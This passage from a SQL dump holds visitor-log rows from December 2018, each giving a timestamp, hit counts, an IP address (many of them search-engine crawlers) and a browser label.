,1,0,0,'46.229.168.141','other'),(355144,1545196626,1,1,0,0,'66.249.66.44','chrome'),(355145,1545196745,2,2,0,0,'34.208.44.162','chrome'),(355146,1545196901,1,1,0,0,'54.36.148.255','other'),(355147,1545197150,1,1,0,0,'157.55.39.188','other'),(355148,1545197877,2,2,0,0,'66.249.66.156','chrome'),(355149,1545198456,1,1,0,0,'46.229.168.148','other'),(355150,1545198457,1,1,0,0,'46.229.168.144','other'),(355151,1545198829,1,1,0,0,'180.76.15.16','other'),(355152,1545198831,1,1,0,0,'180.76.15.20','other'),(355153,1545199982,1,1,0,0,'54.36.148.148','other'),(355154,1545200024,2,2,0,0,'95.163.255.96','other'),(355155,1545200291,1,1,0,0,'157.55.39.123','other'),(355156,1545200743,1,1,0,0,'54.36.148.34','other'),(355157,1545200832,1,1,0,0,'66.249.66.156','chrome'),(355158,1545200880,1,1,0,0,'66.249.66.42','chrome'),(355159,1545201307,1,1,0,0,'54.36.149.45','other'),(355160,1545201481,1,1,0,0,'95.163.255.176','other'),(355161,1545201483,1,1,0,0,'95.163.255.184','other'),(355162,1545201683,1,1,0,0,'54.36.149.104','other'),(355163,1545201858,1,1,0,0,'54.36.148.46','other'),(355164,1545201913,1,1,0,0,'46.229.168.144','other'),(355165,1545201914,1,1,0,0,'46.229.168.140','other'),(355166,1545201952,1,1,0,0,'66.249.66.40','chrome'),(355167,1545202205,1,1,0,0,'157.55.39.123','other'),(355168,1545202208,1,1,0,0,'157.55.39.189','other'),(355169,1545202387,1,1,0,0,'54.36.149.21','other'),(355170,1545202723,1,1,0,0,'54.36.148.62','other'),(355171,1545202762,2,2,0,0,'66.249.66.154','chrome'),(355172,1545203114,2,2,0,0,'91.209.11.236','other'),(355173,1545203375,2,2,0,0,'178.154.244.11','other'),(355174,1545203403,2,2,0,0,'5.45.207.19','other'),(355175,1545203437,1,1,0,0,'46.229.168.152','other'),(355176,1545203439,1,1,0,0,'46.229.168.137','other'),(355177,1545203446,1,1,0,0,'95.163.255.176','other'),(355178,1545203475,1,1,0,0,'95.108.181.54','other'),(355179,1545203552,1,1,0,0,'157.55.39.188','other'),(355180,1545203593,1,1,0,0,'91.196.179.138','chrome'),(355181,1545203656,1,1,0,0,'46.229.168.130','other'),(355182,1545203666,3,3,0,0,'178.154.171.24','other'),(355183,1545203677,1,1,0,0,'5.45.207.8','other'),(355184,1545203810,2,2,0,0,'141.8.142.108','other'),(355185,1545203850,2,2,0,0,'5.45.207.79','other'),(355186,1545203914,1,1,0,0,'178.154.244.65','other'),(355187,1545204085,1,1,0,0,'213.180.203.9','other'),(355188,1545204087,1,1,0,0,'178.154.171.27','other'),(355189,1545204282,5,5,0,0,'178.154.244.11','other'),(355190,1545204420,2,2,0,0,'95.108.213.4','other'),(355191,1545204422,1,1,0,0,'46.229.168.145','other'),(355192,1545204521,2,2,0,0,'5.45.207.19','other'),(355193,1545204552,1,1,0,0,'46.229.168.152','other'),(355194,1545204686,1,1,0,0,'87.250.224.47','other'),(355195,1545204863,2,2,0,0,'5.45.207.79','other'),(355196,1545204926,3,3,0,0,'141.8.142.103','other'),(355197,1545204966,1,1,0,0,'46.229.168.149','other'),(355198,1545204982,1,1,0,0,'178.92.171.245','chrome'),(355199,1545205110,1,1,0,0,'66.249.66.218','chrome'),(355200,1545205167,1,1,0,0,'54.36.148.123','other'),(355201,1545205225,5,5,0,0,'178.154.244.11','other'),(355202,1545205437,2,2,0,0,'199.58.86.209','other'),(355203,1545205606,1,1,0,0,'77.52.179.112','chrome'),(355204,1545205642,1,1,0,0,'95.163.255.150','other'),(355205,1545205728,1,1,0,0,'87.250.224.47','other'),(355206,1545205753,1,1,0,0,'157.55.39.123','other'),(355207,1545205773,1,1,0,0,'176.113.209.232','chrome'),(355208,1545205794,1,1,0,0,'46.229.168.142','other'),(355209,1545205859,1,1,0,0,'5.45.207.19','other'),(355210,1545205864,2,2,0,0,'141.8.142.103','other'),(355211,1545206049,3,3,0,0,'91.196.178.74','chrome'),(355212,1545206199,1,1,0,0,'54.36.148.17','other'),(355213,1545206404,4,4,0,0,'178.154.244.11','other'),(355214,1545206472,1,1,0,0,'54.36.148.216','other'),(355215,1545206516,1,1,0,0,'91.196.178.67','chrome'),(355216,1545206517,1,1,0,0,'95.163.255.93','other'),(355217,1545206520,1,1,0,0,'95.163.255.96','other'),(355218,1545206582,1,1,0,0,'54.36.148.61','other'),(355219,1545206645,1,1,0,0,'91.236.184.19','chrome'),(355220,1545206694,1,1,0,0,'46.229.168.143','other'),(355221,1545206855,1,1,0,0,'54.36.148.95','other'),(355222,1545206901,1,1,0,0,'8.29.198.27','other'),(355223,1545207137,1,1,0,0,'141.8.142.103','other'),(355224,1545207190,1,1,0,0,'8.29.198.26','other'),(355225,1545207438,1,1,0,0,'54.36.148.76','other'),(355226,1545207637,1,1,0,0,'54.36.149.62','other'),(355227,1545207875,2,2,0,0,'178.154.244.11','other'),(355228,1545207943,2,2,0,0,'91.196.178.135','firefox'),(355229,1545208114,1,1,0,0,'95.163.255.118','other'),(355230,1545208141,1,1,0,0,'5.45.207.79','other'),(355231,1545208146,1,1,0,0,'91.196.178.67','chrome'),(355232,1545208209,1,1,0,0,'54.36.149.0','other'),(355233,1545208354,2,2,0,0,'95.163.255.109','other'),(355234,1545208396,1,1,0,0,'54.36.148.119','other'),(355235,1545208500,1,1,0,0,'157.55.39.123','other'),(355236,1545208552,1,1,0,0,'54.36.9.139','chrome'),(355237,1545208611,1,1,0,0,'54.36.148.85','other'),(355238,1545208661,1,1,0,0,'95.163.255.103','other'),(355239,1545208665,1,1,0,0,'66.249.66.156','chrome'),(355240,1545208813,1,1,0,0,'54.36.148.188','other'),(355241,1545208950,1,1,0,0,'95.163.255.117','other'),(355242,1545209129,1,1,0,0,'54.36.148.22','other'),(355243,1545209155,1,1,0,0,'91.196.178.67','chrome'),(355244,1545209230,1,1,0,0,'95.163.255.104','other'),(355245,1545209488,1,1,0,0,'95.163.255.115','other'),(355246,1545209741,1,1,0,0,'95.163.255.108','other'),(355247,1545209748,1,1,0,0,'94.179.5.181','chrome'),(355248,1545209830,1,1,0,0,'46.229.168.149','other'),(355249,1545209831,1,1,0,0,'46.229.168.133','other'),(355250,1545209955,1,1,0,0,'95.163.255.102','other'),(355251,1545209979,1,1,0,0,'66.249.66.220','chrome'),(355252,1545209989,1,1,0,0,'46.201.50.72','firefox'),(355253,1545210105,1,1,0,0,'95.163.255.103','other'),(355254,1545210140,2,2,0,0,'91.196.178.67','chrome'),(355255,1545210238,1,1,0,0,'46.229.168.138','other'),(355256,1545210240,1,1,0,0,'46.229.168.146','other'),(355257,1545210284,1,1,0,0,'95.163.255.105','other'),(355258,1545210331,1,1,0,0,'95.163.255.104','other'),(355259,1545210627,1,1,0,0,'46.229.168.152','other'),(355260,1545210738,1,1,0,0,'54.36.148.120','other'),(355261,1545211148,1,1,0,0,'66.249.66.155','chrome'),(355262,1545211149,2,2,0,0,'66.249.66.152','chrome'),(355263,1545211542,1,1,0,0,'40.77.167.104','other'),(355264,1545211727,1,1,0,0,'54.36.148.175','other'),(355265,1545211772,1,1,0,0,'66.249.66.156','chrome'),(355266,1545212111,1,1,0,0,'54.36.148.177','other'),(355267,1545212230,1,1,0,0,'46.229.168.142','other'),(355268,1545212533,1,1,0,0,'54.36.148.107','other'),(355269,1545212740,1,1,0,0,'157.55.39.189','other'),(355270,1545212766,1,1,0,0,'95.163.255.153','other'),(355271,1545212769,1,1,0,0,'95.163.255.181','other'),(355272,1545212936,1,1,0,0,'40.77.167.48','other'),(355273,1545213092,1,1,0,0,'54.36.148.66','other'),(355274,1545213162,1,1,0,0,'46.229.168.150','other'),(355275,1545213201,1,1,0,0,'54.36.148.155','other'),(355276,1545213376,1,1,0,0,'5.45.207.19','other'),(355277,1545213606,1,1,0,0,'54.36.148.33','other'),(355278,1545214016,1,1,0,0,'91.196.178.67','chrome'),(355279,1545214523,1,1,0,0,'54.36.149.72','other'),(355280,1545215058,1,1,0,0,'54.36.148.55','other'),(355281,1545215396,1,1,0,0,'95.163.255.172','other'),(355282,1545215400,1,1,0,0,'95.163.255.184','other'),(355283,1545215469,1,1,0,0,'91.196.178.67','chrome'),(355284,1545215618,1,1,0,0,'46.229.168.134','other'),(355285,1545215792,4,4,0,0,'178.154.244.11','other'),(355286,1545215929,1,1,0,0,'66.249.66.157','chrome'),(355287,1545215930,1,1,0,0,'66.249.66.154','chrome'),(355288,1545215939,1,1,0,0,'46.229.168.150','other'),(355289,1545216025,3,3,0,0,'5.45.207.19','other'),(355290,1545216050,3,3,0,0,'5.45.207.79','other'),(355291,1545216372,1,1,0,0,'141.8.142.103','other'),(355292,1545216393,2,2,0,0,'91.196.178.67','chrome'),(355293,1545216659,1,1,0,0,'95.163.255.151','other'),(355294,1545216660,1,1,0,0,'54.36.148.83','other'),(355295,1545216782,1,1,0,0,'54.36.148.85','other'),(355296,1545216789,1,1,0,0,'5.58.98.51','firefox'),(355297,1545217037,1,1,0,0,'54.36.148.92','other'),(355298,1545217107,1,1,0,0,'46.229.168.141','other'),(355299,1545217233,1,1,0,0,'207.46.13.1','other'),(355300,1545217589,2,2,0,0,'91.196.178.86','firefox'),(355301,1545217737,1,1,0,0,'8.29.198.27','other'),(355302,1545217956,1,1,0,0,'46.200.40.56','chrome'),(355303,1545218024,1,1,0,0,'8.29.198.25','other'),(355304,1545218040,2,2,0,0,'5.58.98.51','firefox'),(355305,1545218197,1,1,0,0,'157.55.39.189','other'),(355306,1545218226,1,1,0,0,'46.229.168.143','other'),(355307,1545218409,1,1,0,0,'66.249.66.152','chrome'),(355308,1545218523,1,1,0,0,'54.36.149.103','other'),(355309,1545218862,1,1,0,0,'46.229.168.145','other'),(355310,1545219622,2,2,0,0,'46.133.80.165','chrome'),(355311,1545219696,1,1,0,0,'180.76.15.19','other'),(355312,1545219697,1,1,0,0,'180.76.15.34','other'),(355313,1545219809,1,1,0,0,'66.249.66.157','chrome'),(355314,1545219810,1,1,0,0,'66.249.66.156','chrome'),(355315,1545219838,1,1,0,0,'54.36.148.201','other'),(355316,1545220815,1,1,0,0,'54.36.148.230','other'),(355317,1545221040,1,1,0,0,'5.58.98.51','firefox'),(355318,1545221162,1,1,0,0,'178.93.37.59','chrome'),(355319,1545221317,1,1,0,0,'54.36.149.65','other'),(355320,1545221548,1,1,0,0,'54.36.149.61','other'),(355321,1545221781,1,1,0,0,'91.196.178.94','chrome'),(355322,1545221942,2,2,0,0,'178.137.92.180','other'),(355323,1545222187,1,1,0,0,'54.36.148.71','other'),(355324,1545222276,1,1,0,0,'207.46.13.199','other'),(355325,1545222325,2,2,0,0,'91.196.178.67','chrome'),(355326,1545222524,1,1,0,0,'5.58.98.51','firefox'),(355327,1545222921,1,1,0,0,'46.229.168.146','other'),(355328,1545222923,1,1,0,0,'46.229.168.152','other'),(355329,1545223051,1,1,0,0,'66.249.66.157','chrome'),(355330,1545223052,1,1,0,0,'66.249.66.152','chrome'),(355331,1545223130,3,3,0,0,'91.196.178.169','chrome'),(355332,1545223165,1,1,0,0,'66.249.66.42','chrome'),(355333,1545223502,1,1,0,0,'46.229.168.149','other'),(355334,1545223544,2,2,0,0,'91.196.178.67','chrome'),(355335,1545223843,1,1,0,0,'54.36.148.126','other'),(355336,1545223946,1,1,0,0,'54.36.148.222','other'),(355337,1545224305,1,1,0,0,'54.36.149.42','other'),(355338,1545224418,1,1,0,0,'95.163.255.179','other'),(355339,1545224421,1,1,0,0,'95.163.255.178','other'),(355340,1545224513,5,5,0,0,'46.211.11.79','chrome'),(355341,1545224536,1,1,0,0,'91.196.178.67','chrome'),(355342,1545224570,1,1,0,0,'54.36.149.54','other'),(355343,1545224941,1,1,0,0,'54.36.148.82','other'),(355344,1545225141,1,1,0,0,'207.46.13.199','other'),(355345,1545225180,1,1,0,0,'176.98.69.7','chrome'),(355346,1545225234,1,1,0,0,'54.36.148.181','other'),(355347,1545225281,1,1,0,0,'5.58.98.51','firefox'),(355348,1545225300,1,1,0,0,'40.77.167.94','other'),(355349,1545225870,2,2,0,0,'130.180.220.109','chrome'),(355350,1545225889,1,1,0,0,'91.196.178.61','chrome'),(355351,1545226184,1,1,0,0,'207.46.13.199','other'),(355352,1545226235,2,2,0,0,'207.46.13.77','other'),(355353,1545226371,1,1,0,0,'157.55.39.189','other'),(355354,1545226469,1,1,0,0,'54.36.148.131','other'),(355355,1545226621,1,1,0,0,'54.36.148.32','other'),(355356,1545226707,2,2,0,0,'95.163.255.179','other'),(355357,1545226710,1,1,0,0,'95.163.255.172','other'),(355358,1545226840,1,1,0,0,'91.196.178.93','chrome'),(355359,1545226865,1,1,0,0,'78.154.187.11','chrome'),(355360,1545226877,1,1,0,0,'178.92.85.40','chrome'),(355361,1545226916,1,1,0,0,'178.154.244.11','other'),(355362,1545226960,1,1,0,0,'95.163.255.163','other'),(355363,1545226965,1,1,0,0,'95.163.255.197','other'),(355364,1545227036,1,1,0,0,'46.229.168.133','other'),(355365,1545227062,1,1,0,0,'95.163.255.171','other'),(355366,1545227126,1,1,0,0,'66.102.9.62','chrome'),(355367,1545227188,1,1,0,0,'54.36.148.157','other'),(355368,1545227220,2,2,0,0,'91.196.178.67','chrome'),(355369,1545227235,1,1,0,0,'207.46.13.77','other'),(355370,1545227313,1,1,0,0,'54.36.148.102','other'),(355371,1545227326,1,1,0,0,'95.135.54.178','chrome'),(355372,1545227489,1,1,0,0,'5.58.98.51','firefox'),(355373,1545227506,1,1,0,0,'141.8.142.103','other'),(355374,1545227609,2,2,0,0,'5.45.207.19','other'),(355375,1545227730,1,1,0,0,'54.36.149.27','other'),(355376,1545228121,1,1,0,0,'54.36.148.140','other'),(355377,1545228230,1,1,0,0,'46.229.168.147','other'),(355378,1545228451,1,1,0,0,'91.196.178.86','firefox'),(355379,1545228454,1,1,0,0,'54.36.148.239','other'),(355380,1545228577,2,2,0,0,'8.29.198.25','other'),(355381,1545228614,1,1,0,0,'178.154.244.11','other'),(355382,1545228657,1,1,0,0,'207.46.13.77','other'),(355383,1545228661,7,7,0,0,'40.77.167.94','other'),(355384,1545228668,10,10,0,0,'207.46.13.199','other'),(355385,1545228773,1,1,0,0,'95.163.255.106','other'),(355386,1545228918,2,2,0,0,'87.250.224.65','other'),(355387,1545228947,1,1,0,0,'54.36.148.116','other'),(355388,1545229014,4,4,0,0,'141.8.142.103','other'),(355389,1545229044,3,3,0,0,'5.45.207.19','other'),(355390,1545229058,1,1,0,0,'37.9.113.148','other'),(355391,1545229160,6,6,0,0,'157.55.39.189','other'),(355392,1545229182,3,3,0,0,'5.45.207.79','other'),(355393,1545229317,2,2,0,0,'95.132.21.36','chrome'),(355394,1545229335,1,1,0,0,'95.163.255.119','other'),(355395,1545229345,2,2,0,0,'91.196.178.92','firefox'),(355396,1545229662,1,1,0,0,'54.36.148.99','other'),(355397,1545229855,2,2,0,0,'95.163.255.103','other'),(355398,1545229919,1,1,0,0,'54.36.148.146','other'),(355399,1545230143,1,1,0,0,'95.108.213.4','other'),(355400,1545230176,1,1,0,0,'95.163.255.117','other'),(355401,1545230287,1,1,0,0,'5.45.207.79','other'),(355402,1545230309,3,3,0,0,'5.45.207.19','other'),(355403,1545230407,1,1,0,0,'95.163.255.119','other'),(355404,1545230534,2,2,0,0,'141.8.142.103','other'),(355405,1545230634,1,1,0,0,'91.196.178.94','firefox'),(355406,1545230862,3,3,0,0,'178.154.244.11','other'),(355407,1545230903,1,1,0,0,'178.154.244.49','other'),(355408,1545230960,1,1,0,0,'157.55.39.189','other'),(355409,1545230974,1,1,0,0,'141.8.142.108','other'),(355410,1545231304,1,1,0,0,'54.36.148.220','other'),(355411,1545231408,1,1,0,0,'37.55.57.164','chrome'),(355412,1545231533,3,3,0,0,'5.45.207.79','other'),(355413,1545231565,1,1,0,0,'54.36.148.46','other'),(355414,1545231628,1,1,0,0,'54.36.148.37','other'),(355415,1545231689,3,3,0,0,'5.45.207.19','other'),(355416,1545231898,1,1,0,0,'54.36.148.188','other'),(355417,1545231924,2,2,0,0,'91.196.178.67','chrome'),(355418,1545232058,2,2,0,0,'141.8.142.103','other'),(355419,1545232118,3,3,0,0,'178.154.244.11','other'),(355420,1545232245,1,1,0,0,'91.196.177.46','chrome'),(355421,1545232465,1,1,0,0,'66.249.66.154','chrome'),(355422,1545232487,1,1,0,0,'95.108.213.4','other'),(355423,1545232585,1,1,0,0,'37.9.113.20','other'),(355424,1545232596,2,2,0,0,'40.77.167.94','other'),(355425,1545232604,1,1,0,0,'5.45.207.79','other'),(355426,1545232997,1,1,0,0,'141.8.142.103','other'),(355427,1545233323,1,1,0,0,'54.36.149.80','other'),(355428,1545233756,1,1,0,0,'54.36.148.26','other'),(355429,1545234272,2,2,0,0,'66.249.66.156','chrome'),(355430,1545234326,1,1,0,0,'46.229.168.151','other'),(355431,1545234390,1,1,0,0,'54.36.149.71','other'),(355432,1545234632,1,1,0,0,'207.46.13.77','other'),(355433,1545235002,1,1,0,0,'54.36.148.19','other'),(355434,1545235306,1,1,0,0,'91.196.178.53','chrome'),(355435,1545235472,1,1,0,0,'54.36.149.51','other'),(355436,1545235481,1,1,0,0,'95.163.255.179','other'),(355437,1545235485,1,1,0,0,'95.163.255.164','other'),(355438,1545235936,1,1,0,0,'54.36.149.18','other'),(355439,1545235972,1,1,0,0,'66.249.66.57','chrome'),(355440,1545235973,1,1,0,0,'66.249.66.44','chrome'),(355441,1545236106,1,1,0,0,'54.36.149.95','other'),(355442,1545236186,1,1,0,0,'5.45.207.79','other'),(355443,1545236188,2,2,0,0,'5.45.207.19','other'),(355444,1545236333,1,1,0,0,'66.249.66.155','chrome'),(355445,1545236334,1,1,0,0,'66.249.66.154','chrome'),(355446,1545236524,1,1,0,0,'54.36.149.37','other'),(355447,1545236820,2,2,0,0,'46.133.6.18','chrome'),(355448,1545237538,1,1,0,0,'54.36.149.44','other'),(355449,1545237778,2,2,0,0,'5.45.207.79','other'),(355450,1545237902,1,1,0,0,'5.45.207.19','other'),(355451,1545238192,1,1,0,0,'37.9.113.148','other'),(355452,1545238331,1,1,0,0,'54.36.148.100','other'),(355453,1545238341,1,1,0,0,'95.163.255.176','other'),(355454,1545238343,1,1,0,0,'95.163.255.185','other'),(355455,1545238662,1,1,0,0,'46.229.168.150','other'),(355456,1545238810,1,1,0,0,'5.45.207.19','other'),(355457,1545238873,1,1,0,0,'141.8.142.103','other'),(355458,1545238914,1,1,0,0,'54.36.149.76','other'),(355459,1545239276,1,1,0,0,'5.45.207.79','other'),(355460,1545239410,1,1,0,0,'8.29.198.26','other'),(355461,1545239419,1,1,0,0,'5.58.3.17','opera'),(355462,1545239513,1,1,0,0,'207.46.13.77','other'),(355463,1545239618,1,1,0,0,'54.36.148.90','other'),(355464,1545239680,1,1,0,0,'8.29.198.27','other'),(355465,1545239716,1,1,0,0,'31.148.135.47','other'),(355466,1545239768,2,2,0,0,'157.55.39.189','other'),(355467,1545239956,1,1,0,0,'54.36.149.96','other'),(355468,1545240183,1,1,0,0,'54.36.148.16','other'),(355469,1545240195,1,1,0,0,'54.36.148.18','other'),(355470,1545240306,4,4,0,0,'178.154.244.11','other'),(355471,1545240351,5,5,0,0,'5.45.207.19','other'),(355472,1545240371,4,4,0,0,'5.45.207.79','other'),(355473,1545240472,3,3,0,0,'141.8.142.103','other'),(355474,1545240985,1,1,0,0,'87.250.224.65','other'),(355475,1545241009,1,1,0,0,'95.163.255.179','other'),(355476,1545241012,1,1,0,0,'95.163.255.188','other'),(355477,1545241278,1,1,0,0,'91.196.178.77','chrome'),(355478,1545241293,1,1,0,0,'207.46.13.77','other'),(355479,1545241304,1,1,0,0,'207.46.13.199','other'),(355480,1545241343,6,6,0,0,'5.45.207.79','other'),(355481,1545241415,4,4,0,0,'178.154.244.11','other'),(355482,1545241489,3,3,0,0,'5.45.207.19','other'),(355483,1545241641,4,4,0,0,'141.8.142.103','other'),(355484,1545241843,1,1,0,0,'95.108.213.4','other'),(355485,1545241930,1,1,0,0,'54.36.149.35','other'),(355486,1545242001,1,1,0,0,'54.36.148.107','other'),(355487,1545242118,1,1,0,0,'54.36.148.225','other'),(355488,1545242304,1,1,0,0,'157.55.39.189','other'),(355489,1545242317,1,1,0,0,'46.229.168.132','other'),(355490,1545242318,1,1,0,0,'46.229.168.143','other'),(355491,1545242332,5,5,0,0,'5.45.207.79','other'),(355492,1545242410,4,4,0,0,'5.45.207.19','other'),(355493,1545242460,2,2,0,0,'193.19.252.230','chrome'),(355494,1545242468,1,1,0,0,'54.36.148.137','other'),(355495,1545242488,3,3,0,0,'178.154.244.11','other'),(355496,1545242521,1,1,0,0,'46.229.168.130','other'),(355497,1545242600,2,2,0,0,'141.8.142.103','other'),(355498,1545242703,1,1,0,0,'54.36.148.75','other'),(355499,1545242786,1,1,0,0,'54.36.148.94','other'),(355500,1545242856,1,1,0,0,'46.229.168.148','other'),(355501,1545242858,1,1,0,0,'46.229.168.144','other'),(355502,1545242965,2,2,0,0,'91.196.178.70','firefox'),(355503,1545243479,1,1,0,0,'54.36.149.19','other'),(355504,1545243480,1,1,0,0,'207.46.13.77','other'),(355505,1545243500,1,1,0,0,'207.46.13.199','other'),(355506,1545243539,1,1,0,0,'157.55.39.189','other'),(355507,1545243570,1,1,0,0,'95.163.255.171','other'),(355508,1545243576,1,1,0,0,'95.163.255.180','other'),(355509,1545243659,1,1,0,0,'95.134.168.30','chrome'),(355510,1545244043,1,1,0,0,'54.36.148.87','other'),(355511,1545244222,1,1,0,0,'91.196.178.175','chrome'),(355512,1545244248,1,1,0,0,'46.229.168.130','other'),(355513,1545244727,1,1,0,0,'54.36.148.169','other'),(355514,1545244766,2,2,0,0,'193.160.224.13','other'),(355515,1545244813,1,1,0,0,'46.229.168.138','other'),(355516,1545244956,2,2,0,0,'157.55.39.189','other'),(355517,1545245014,1,1,0,0,'178.154.244.11','other'),(355518,1545245129,3,3,0,0,'91.196.178.171','chrome'),(355519,1545245362,1,1,0,0,'54.36.148.233','other'),(355520,1545245488,2,2,0,0,'91.196.178.129','firefox'),(355521,1545245590,1,1,0,0,'95.163.255.187','other'),(355522,1545245619,1,1,0,0,'54.36.148.208','other'),(355523,1545245784,1,1,0,0,'54.36.148.182','other'),(355524,1545245827,1,1,0,0,'54.36.148.77','other'),(355525,1545245904,1,1,0,0,'207.46.13.199','other'),(355526,1545246030,1,1,0,0,'91.196.178.171','chrome'),(355527,1545246356,1,1,0,0,'54.36.149.2','other'),(355528,1545246603,1,1,0,0,'46.211.70.123','chrome'),(355529,1545246710,1,1,0,0,'46.229.168.149','other'),(355530,1545246732,1,1,0,0,'95.163.255.181','other'),(355531,1545246735,1,1,0,0,'95.163.255.185','other'),(355532,1545247432,2,2,0,0,'157.55.39.189','other'),(355533,1545247451,1,1,0,0,'207.46.13.199','other'),(355534,1545247948,1,1,0,0,'91.196.178.171','chrome'),(355535,1545247995,1,1,0,0,'54.36.148.111','other'),(355536,1545248080,1,1,0,0,'54.36.149.72','other'),(355537,1545248087,1,1,0,0,'78.154.161.134','opera'),(355538,1545248217,1,1,0,0,'141.8.142.103','other'),(355539,1545248271,1,1,0,0,'40.77.167.94','other'),(355540,1545248685,1,1,0,0,'87.250.224.47','other'),(355541,1545248697,1,1,0,0,'178.154.244.11','other'),(355542,1545249241,1,1,0,0,'54.36.148.81','other'),(355543,1545249553,1,1,0,0,'46.229.168.137','other'),(355544,1545249836,1,1,0,0,'207.46.13.199','other'),(355545,1545250139,1,1,0,0,'54.36.148.210','other'),(355546,1545250244,2,2,0,0,'8.29.198.27','other'),(355547,1545250318,2,2,0,0,'46.133.239.165','chrome'),(355548,1545250377,1,1,0,0,'91.196.178.99','chrome'),(355549,1545250583,1,1,0,0,'78.154.161.134','opera'),(355550,1545250628,1,1,0,0,'176.113.170.104','chrome'),(355551,1545250759,1,1,0,0,'93.76.90.164','firefox'),(355552,1545251216,1,1,0,0,'37.53.122.166','chrome'),(355553,1545252061,2,2,0,0,'91.209.11.236','other'),(355554,1545252244,1,1,0,0,'40.77.167.94','other'),(355555,1545252262,1,1,0,0,'54.36.148.50','other'),(355556,1545252299,1,1,0,0,'46.229.168.139','other'),(355557,1545252403,1,1,0,0,'46.229.168.151','other'),(355558,1545252719,4,4,0,0,'141.8.142.103','other'),(355559,1545252752,1,1,0,0,'95.108.213.4','other'),(355560,1545252779,1,1,0,0,'87.250.224.65','other'),(355561,1545252792,5,5,0,0,'5.45.207.19','other'),(355562,1545252848,2,2,0,0,'178.154.244.11','other'),(355563,1545252867,4,4,0,0,'5.45.207.79','other'),(355564,1545252930,1,1,0,0,'87.250.224.47','other'),(355565,1545253580,1,1,0,0,'40.77.167.94','other'),(355566,1545253632,1,1,0,0,'54.36.149.13','other'),(355567,1545253937,1,1,0,0,'54.36.149.42','other'),(355568,1545253989,2,2,0,0,'207.46.13.199','other'),(355569,1545254040,1,1,0,0,'82.145.208.43','other'),(355570,1545254530,1,1,0,0,'46.229.168.133','other'),(355571,1545254632,1,1,0,0,'54.36.148.141','other'),(355572,1545254710,1,1,0,0,'95.163.255.95','other'),(355573,1545254716,1,1,0,0,'95.163.255.97','other'),(355574,1545254908,1,1,0,0,'95.163.255.67','other'),(355575,1545254912,1,1,0,0,'95.163.255.62','other'),(355576,1545255166,1,1,0,0,'54.36.148.236','other'),(355577,1545255571,1,1,0,0,'54.36.148.31','other'),(355578,1545256204,1,1,0,0,'95.163.255.67','other'),(355579,1545256208,1,1,0,0,'95.163.255.66','other'),(355580,1545256434,1,1,0,0,'13.66.139.0','other'),(355581,1545256796,1,1,0,0,'207.46.13.77','other'),(355582,1545257080,1,1,0,0,'207.46.13.199','other'),(355583,1545257230,1,1,0,0,'40.77.167.9','other'),(355584,1545257456,1,1,0,0,'46.229.168.136','other'),(355585,1545257517,1,1,0,0,'40.77.167.94','other'),(355586,1545257663,1,1,0,0,'194.44.135.35','opera'),(355587,1545257713,1,1,0,0,'46.229.168.147','other'),(355588,1545258395,1,1,0,0,'54.36.148.154','other'),(355589,1545258449,1,1,0,0,'40.77.167.9','other'),(355590,1545258542,1,1,0,0,'54.36.148.134','other'),(355591,1545258647,1,1,0,0,'5.45.207.79','other'),(355592,1545259162,1,1,0,0,'95.163.255.105','other'),(355593,1545259221,1,1,0,0,'207.46.13.199','other'),(355594,1545259366,1,1,0,0,'46.229.168.132','other'),(355595,1545259474,1,1,0,0,'207.46.13.6','other'),(355596,1545259515,1,1,0,0,'54.36.148.105','other'),(355597,1545259605,1,1,0,0,'46.229.168.148','other'),(355598,1545259618,1,1,0,0,'95.163.255.118','other'),(355599,1545259693,1,1,0,0,'87.250.224.47','other'),(355600,1545259835,1,1,0,0,'95.47.148.27','firefox'),(355601,1545259940,1,1,0,0,'46.229.168.151','other'),(355602,1545259941,1,1,0,0,'46.229.168.146','other'),(355603,1545260006,1,1,0,0,'54.36.148.127','other'),(355604,1545260157,1,1,0,0,'46.229.168.143','other'),(355605,1545260226,1,1,0,0,'40.77.167.94','other'),(355606,1545260510,1,1,0,0,'40.77.167.9','other'),(355607,1545260897,1,1,0,0,'95.163.255.153','other'),(355608,1545260900,1,1,0,0,'95.163.255.175','other'),(355609,1545260979,1,1,0,0,'5.45.207.79','other'),(355610,1545260983,1,1,0,0,'141.8.142.103','other'),(355611,1545261005,1,1,0,0,'95.163.255.97','other'),(355612,1545261071,1,1,0,0,'8.29.198.26','other'),(355613,1545261353,1,1,0,0,'8.29.198.25','other'),(355614,1545261802,1,1,0,0,'207.46.13.207','other'),(355615,1545261844,1,1,0,0,'5.45.207.19','other'),(355616,1545261956,1,1,0,0,'54.36.148.222','other'),(355617,1545262878,1,1,0,0,'95.108.213.4','other'),(355618,1545262929,1,1,0,0,'54.36.149.59','other'),(355619,1545263053,1,1,0,0,'40.77.167.94','other'),(355620,1545263117,1,1,0,0,'46.229.168.137','other'),(355621,1545263337,1,1,0,0,'46.229.168.138','other'),(355622,1545263338,1,1,0,0,'46.229.168.134','other'),(355623,1545263698,3,3,0,0,'5.45.207.19','other'),(355624,1545263702,1,1,0,0,'87.250.224.47','other'),(355625,1545263784,1,1,0,0,'141.8.142.103','other'),(355626,1545263804,2,2,0,0,'5.45.207.79','other'),(355627,1545263807,5,5,0,0,'178.154.244.11','other'),(355628,1545264103,1,1,0,0,'95.108.213.4','other'),(355629,1545264259,1,1,0,0,'54.36.148.221','other'),(355630,1545264882,3,3,0,0,'141.8.142.103','other'),(355631,1545264974,4,4,0,0,'178.154.244.11','other'),(355632,1545265123,2,2,0,0,'87.250.224.65','other'),(355633,1545265128,1,1,0,0,'37.9.113.103','other'),(355634,1545265130,8,8,0,0,'5.45.207.79','other'),(355635,1545265132,9,9,0,0,'5.45.207.19','other'),(355636,1545265134,2,2,0,0,'87.250.224.47','other'),(355637,1545265138,1,1,0,0,'37.9.113.148','other'),(355638,1545265354,1,1,0,0,'46.229.168.142','other'),(355639,1545265652,3,3,0,0,'95.108.213.4','other'),(355640,1545265828,1,1,0,0,'157.55.39.84','other'),(355641,1545265911,1,1,0,0,'213.180.203.9','other'),(355642,1545265915,1,1,0,0,'178.154.244.11','other'),(355643,1545266132,2,2,0,0,'216.244.66.241','other'),(355644,1545266234,1,1,0,0,'95.163.255.172','other'),(355645,1545266238,1,1,0,0,'95.163.255.166','other'),(355646,1545266632,1,1,0,0,'87.250.224.47','other'),(355647,1545266642,2,2,0,0,'5.45.207.19','other'),(355648,1545266958,4,4,0,0,'178.154.244.11','other'),(355649,1545267177,1,1,0,0,'5.45.207.79','other'),(355650,1545267321,1,1,0,0,'62.210.157.133','other'),(355651,1545267624,1,1,0,0,'5.45.207.8','other'),(355652,1545267647,1,1,0,0,'37.9.113.103','other'),(355653,1545267976,2,2,0,0,'40.77.167.137','oth